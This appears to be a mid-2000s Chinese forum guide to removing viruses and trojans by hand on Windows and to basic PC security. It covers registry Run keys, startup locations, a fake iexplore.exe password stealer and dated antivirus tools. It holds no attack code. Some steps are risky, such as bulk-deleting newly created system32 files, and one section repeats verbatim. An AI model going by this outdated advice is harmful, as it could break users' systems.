还有防止木马的Ewido 4.0 、木马克星和金山的反木马软件(可选)。
并且能够及时更新你的病毒定义库,定期给你的系统进行全面杀毒。杀毒务必在安全模式下进行,这样才能有效清除电脑内的病毒以及驻留在系统的非法文件。
还有就是一定要给自己的系统及时的打上补丁,***最新的升级包。微软的补丁一般会在漏洞发现半个月后发布,而且如果你使用的是中文版的操作系统,那么至少要等一个月的时间才能下到补丁,也就是说这一个月的时间内你的系统因为这个漏洞是很危险的。
本人强烈建议个人用户***使用防火墙(目前最有效的方式)。
例如:天网个人防火墙、诺顿防火墙、瑞星防火墙等等。
因为防火墙具有数据过滤功能,可以有效的过滤掉恶意代码,和阻止DDOS攻击等等。总之如今的防火墙功能强大,连漏洞扫描都有,所以你只要***防火墙就可以杜绝大多数网络攻击,但是就算是装防火墙也不要以为就万事无忧。因为安全只是相对的,如果哪个邪派高手看上你的机器,防火墙也无济于事。我们只能尽量提高我们的安全系数,尽量把损失减少到最小。
(二)、病毒一般解决方案
首先建议使用最新的专业杀毒软件和木马专杀工具Ewido 4.0和卡巴斯基等进行处理,如遇杀毒软件被禁用或杀毒失败或一开机就重新出现的情况:(如果是IE上网浏览的问题及其他与IE有关问题,先阅读步骤4 !!)
1.打开windows任务管理器,察看是否有可疑的进程(可以根据杀毒软件的报告或者在网上搜索相关信息来判定)在运行,如果有把它结束。注意在system32目录下的Rundll32.exe本身不是病毒,有可能一个dll文件在运行,他才可能是病毒或恶意程序之类的东西。由于windows任务管理器不能显示进程的路径,因此建议使用杀毒软件自带的进程察看和管理工具来查找并中止可疑进程。然后设法找到病毒程序文件(主要是你所中止的病毒进程文件,另外先在资源管理器的文件夹选项中,设置显示所有文件和文件夹、显示受保护的文件,再察看如system32文件夹中是否有不明dll或exe文件,C:\Program Files C:\Documents and Settings\user\Local Settings\Temporary Internet Files C:\Documents and Settings\user\Local Settings\Temp 等处是否有不明文件或病毒程序文件),然后删去,搞清楚是否是系统文件再动手。
2.有些病毒进程终止不了,提示“拒绝访问”,或者出现“屡禁不止”的情况。根据我的经验,有三种办法供尝试:
A.可能是某些木马病毒、流氓软件等注册为系统服务了。办法是:察看控制面板〉管理工具〉服务,看有没有与之相关的服务(特别是“描述”为空的)在运行,把它停止。再试着中止病毒进程并删除。
B.你可以尝试安全模式下(开机后按F8选安全模式)用杀毒软件处理,不行则再按步骤1和2A试一试。
C.(慎用)使用冰刃等工具,察看病毒进程的线程信息和模块信息,尝试结束线程和解除模块,再试着删除病毒进程文件和相应的模块。(慎用)
3.如果稍微懂得注册表使用的,可以再把相关的注册表键值删除。一般方法:开始〉运行,输入regedit,确定,打开注册表编辑器。编辑〉查找,查找目标为病毒进程名,在搜索结果中将与之有关的键值删除。有时这样做不能遏止病毒,还应尝试使用步骤2中方法。
4.某些病毒会劫持IE浏览器,导致乱弹网页的状况。建议用金山毒霸的金山反间谍 2006等修复工具。看浏览器辅助对象BHO是否有可疑项目。有就修复它。修复失败时参照1、2来做。
5.其他提示:为了更好的操作,请先用优化大师或超级兔子清理所有临时文件和上网时的缓存文件。一般病毒往往在临时文件夹Temp中,这样做可以帮你更快找到病毒文件。
开始〉运行,输入msconfig,确定,可以打开“系统配置实用程序”。选择“启动”,察看开机时加载的程序,如果在其中发现病毒程序,可以禁止它在开机时加载。不过此法治标不治本,甚至对某些程序来说无效。还是要按步骤1、2办。
6、木马的查杀,可以采用自动和手动两种方式。最简单的删除木马的方法是***杀毒软件(自动),现在很多杀毒软件能删除网络最猖獗的木马,建议***金山毒霸或安全之星XP,它们在查杀木马方面很有一套!
由于杀毒软件的升级多数情况下慢于木马的出现,因此学会手工查杀非常必要。方法是:
1.)检查注册表
看HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curren Version和HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion下,所有以“Run”开头的键值名,其下有没有可疑的文件名。如果有,就需要删除相应的键值,再删除相应的应用程序。
2.)检查启动组
木马们如果隐藏在启动组虽然不是十分隐蔽,但这里的确是自动加载运行的好场所,因此还是有木马喜欢在这里驻留的。启动组对应的文件夹为:C:\windows\start menu\programs\startup,在注册表中的位置:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell
Folders Startup=C:\windows\start menu\programs\startu quot;。要注意经常检查这两个地方哦!
3.)Win.ini以及System.ini也是木马们喜欢的隐蔽场所,要注意这些地方
比方说,Win.ini的[Windows]小节下的load和run后面在正常情况下是没有跟什么程序的,如果有了那就要小心了,看看是什么;在System.ini的[boot]小节的Shell=Explorer.exe后面也是加载木马的好场所,因此也要注意这里了。当你看到变成这样:Shell=Explorer.exe wind0ws.exe,请注意那个wind0ws.exe很有可能就是木马服务端程序!赶快检查吧。
4.)对于下面所列文件也要勤加检查,木马们也很可能隐藏在那里
C:\windows\wi tart.bat、C:\windows\wininit.ini、Autoexec.bat。
5.)如果是EXE文件启动,那么运行这个程序,看木马是否被装入内存,端口是否打开。如果是的话,则说明要么是该文件启动木马程序,要么是该文件捆绑了木马程序,只好再找一个这样的程序,重新***一下了。
6.)万变不离其宗,木马启动都有一个方式,它只是在一个特定的情况下启动
所以,平时多注意一下你的端口,查看一下正在运行的程序,用此来监测大部分木马应该没问题的。
另外,你也可以试试用下面的办法来解决:
从网上下一个叫“冰刃”的软件。这是一个绿色免***的小软件,可以放心使用。
这个是下载地址。
[url]http://www.ttian.net/we ite/2005/0829/391.html[/url]
这个是它的详细用法。
[url]http://www.ccw.com.cn/soft/review/htm2005/20050930_2107Z.htm[/url]
一般来说,不管是木马、病毒进入我们的机器后都是“三隐”的即隐进程、隐服务、隐文件的,利害的能将杀毒软件有实时监控给杀死!但在这个冰刃里,它是无法遁身的。开启的非法进程会以红色显示出来。
至于杀毒软件,应该说各人有各人的喜好,下面给出的链接上你看看比较一下:
六款主流杀毒软件横向评测
[url]http://it.sohu.com/2004/05/19/39/article220183986.shtml[/url]
7.说了这么多,不过有时还是不能解决。只好请教高人或格式化重做系统了,当然不推荐后者!
(三)、手工清除病毒和木马,适用于难缠的对手。
在进程里先结束IEXPLORE.EXE然后到网上找相关的杀毒工具
iexplore.exe是Microsoft Internet Explorer的主程序。这个微软Windows应用程序让你在网上冲浪,和访问本地Interanet网络。这不是纯粹的系统程序,但是如果终止它,可能会导致不可知的问题。iexplore.exe同时也是Avant网络浏览器的一部分,这是一个免费的基于Internet Explorer的浏览器。注意iexplore.exe也有可能是Trojan.Kill***.B病毒,该病毒会终止你的反病毒软件,和一些Windows系统工具,该进程的安全等级是建议删除
这个东西可以说是病毒,也可以说不是病毒。
因为微软的浏览器就是IEXPLORE.EXE,但是它一般情况随系统被***在C:\Program Files\Internet Explorer下面。那么,如果发现这个文件是在这个目录下面的,一般情况不是病毒,当然,不包括已经被感染了的情况;还有一种情况,就是IEXPLORE.EXE在C:\WINDOWS\system32\下面,那么这个十有八九都是病毒。
iexplore.exe进程--病毒
系统进程--伪装的病毒 iexplore.exe
Trojan.PowerSpider.ac 破坏方法:密码解霸V8.10。又称“密码结巴”
偷用户各种密码,包含:游戏密码、局域网密码、腾讯QQ账号和密码、POP3 密码、Win9x缓存密码及拨号账号等等。这个木马所偷密码的范围很广,对广大互联网用户的潜在威胁也巨大。
1。系统进程中有iexplore.exe运行,注意,是小写字母
2。搜索该程序iexplore.exe,不是位于C盘下的PROGRAMME文件夹,而是WINDOWS32文件夹。
解决办法:
1。到C:\\WINDOWS\\system32下找到ixplore.exe 和 inthk.dll 完全删除之。
2。到注册表中,找到HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion
\\Run “m ysint”= iexplore.exe,删除其键值
在进程里先结束IEXPLORE.EXE然后到网上找相关的杀毒工具
iexplore.exe是Microsoft Internet Explorer的主程序。这个微软Windows应用程序让你在网上冲浪,和访问本地Interanet网络。这不是纯粹的系统程序,但是如果终止它,可能会导致不可知的问题。iexplore.exe同时也是Avant网络浏览器的一部分,这是一个免费的基于Internet Explorer的浏览器。注意iexplore.exe也有可能是Trojan.Kill***.B病毒,该病毒会终止你的反病毒软件,和一些Windows系统工具,该进程的安全等级是建议删除
这个东西可以说是病毒,也可以说不是病毒。
因为微软的浏览器就是IEXPLORE.EXE,但是它一般情况随系统被***在C:\Program Files\Internet Explorer下面。那么,如果发现这个文件是在这个目录下面的,一般情况不是病毒,当然,不包括已经被感染了的情况;还有一种情况,就是IEXPLORE.EXE在C:\WINDOWS\system32\下面,那么这个十有八九都是病毒。
iexplore.exe进程--病毒
系统进程--伪装的病毒 iexplore.exe
Trojan.PowerSpider.ac 破坏方法:密码解霸V8.10。又称“密码结巴”
偷用户各种密码,包含:游戏密码、局域网密码、腾讯QQ账号和密码、POP3 密码、Win9x缓存密码及拨号账号等等。这个木马所偷密码的范围很广,对广大互联网用户的潜在威胁也巨大。
1。系统进程中有iexplore.exe运行,注意,是小写字母
2。搜索该程序iexplore.exe,不是位于C盘下的PROGRAMME文件夹,而是WINDOWS32文件夹。
解决办法:
1。到C:\\WINDOWS\\system32下找到ixplore.exe 和 inthk.dll 完全删除之。
2。到注册表中,找到HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion
\\Run “m ysint”= iexplore.exe,删除其键值
(四)、针对难以处理的病毒通用处置方式
首先也是最重要的,重新启动电脑到安全模式下,让所有文件都可见。
然后进入到C:看看根目录是否存在不熟悉的文件,如果有,且日期为发现中毒现象当天,则删除之。
接着到c:\windows,首先按照修改时间顺序排列图标,查看最下面的文件,如果发现有当天新建的文件,且为没有见过的删除之。
再进system32 同样按照修改时间顺序排列图标,查看最下面的文件,如果发现有当天新建的文件,且扩展名明显有问题的,比如“msconfig.com”,别给它骗了,扩展名不对,又是当天新建的文件,肯定有鬼,删除之。
再看看system32这儿有没有当天新建的文件夹,如果有且为不熟悉,同样删除之。
退出到program files这个目录里,按照上面的方法进行查看。还需要查看的地方有IE文件夹(一定要进去看一看,这儿常常有问题)、common files文件夹。
最后,查看注册表的启动项,如果有多于的那么一定就是有问题的了,删除之。
最后清空临时文件夹(可以使用超级兔子)
重启电脑,如果系统提示找不到文件,那么可能是注册表还有被改的地方,按照提示对注册表进行修改。
这些就是查杀病毒木马的一个通用的步骤了,当然有些病毒木马还会在其他盘下作怪,甚至破坏诸如.exe一类的文件,这些就需要进一步的清理和恢复工作了。
(五)、个人电脑安全防护策略
一、 杀(防)毒软件不可少
病毒的发作给全球计算机系统造成巨大损失,令人们谈“毒”色变。上网的人中,很少有谁没被病毒侵害过。对于一般用户而言,首先要做的就是为电脑***一套正版的杀毒软件。
现在不少人对防病毒有个误区,就是对待电脑病毒的关键是“杀”,其实对待电脑病毒应当是以“防”为主。目前绝大多数的杀毒软件都在扮演“事后诸葛亮”的角色,即电脑被病毒感染后杀毒软件才忙不迭地去发现、分析和治疗。这种被动防御的消极模式远不能彻底解决计算机安全问题。杀毒软件应立足于拒病毒于计算机门外。因此应当***杀毒软件的实时监控程序,应该定期升级所***的杀毒软件(如果***的是网络版,在***时可先将其设定为自动升级),给操作系统打相应补丁、升级引擎和病毒定义码。由于新病毒的出现层出不穷,现在各杀毒软件厂商的病毒库更新十分频繁,应当设置每天定时更新杀毒实时监控程序的病毒库,以保证其能够抵御最新出现的病毒的攻击。
每周要对电脑进行一次全面的杀毒、扫描工作,以便发现并清除隐藏在系统中的病毒。当用户不慎感染上病毒时,应该立即将杀毒软件升级到最新版本,然后对整个硬盘进行扫描操作,清除一切可以查杀的病毒。如果病毒无法清除,或者杀毒软件不能做到对病毒体进行清晰的辨认,那么应该将病毒提交给杀毒软件公司,杀毒软件公司一般会在短期内给予用户满意的答复。而面对网络攻击之时,我们的第一反应应该是拔掉网络连接端口,或按下杀毒软件上的断开网络连接钮。
二、个人防火墙不可替代
如果有条件,***个人防火墙(Fire Wall)以抵御黑客的袭击。所谓“防火墙”,是指一种将内部网和公众访问网(Internet)分开的方法,实际上是一种隔离技术。防火墙是在两个网络通讯时执行的一种访问控制尺度,它能允许你“同意”的人和数据进入你的网络,同时将你“不同意”的人和数据拒之门外,最大限度地阻止网络中的黑客来访问你的网络,防止他们更改、拷贝、毁坏你的重要信息。防火墙***和投入使用后,并非万事大吉。要想充分发挥它的安全防护作用,必须对它进行跟踪和维护,要与商家保持密切的联系,时刻注视商家的动态。因为商家一旦发现其产品存在安全漏洞,就会尽快发布补救(Patch) 产品,此时应尽快确认真伪(防止特洛伊木马等病毒),并对防火墙进行更新。在理想情况下,一个好的防火墙应该能把各种安全问题在发生之前解决。就现实情况看,这还是个遥远的梦想。目前各家杀毒软件的厂商都会提供个人版防火墙软件,防病毒软件中都含有个人防火墙,所以可用同一张光盘运行个人防火墙***,重点提示防火墙在***后一定要根据需求进行详细配置。合理设置防火墙后应能防范大部分的蠕虫入侵。
三、分类设置密码并使密码设置尽可能复杂
在不同的场合使用不同的密码。网上需要设置密码的地方很多,如网上银行、上网账户、E-Mail、聊天室以及一些网站的会员等。应尽可能使用不同的密码,以免因一个密码
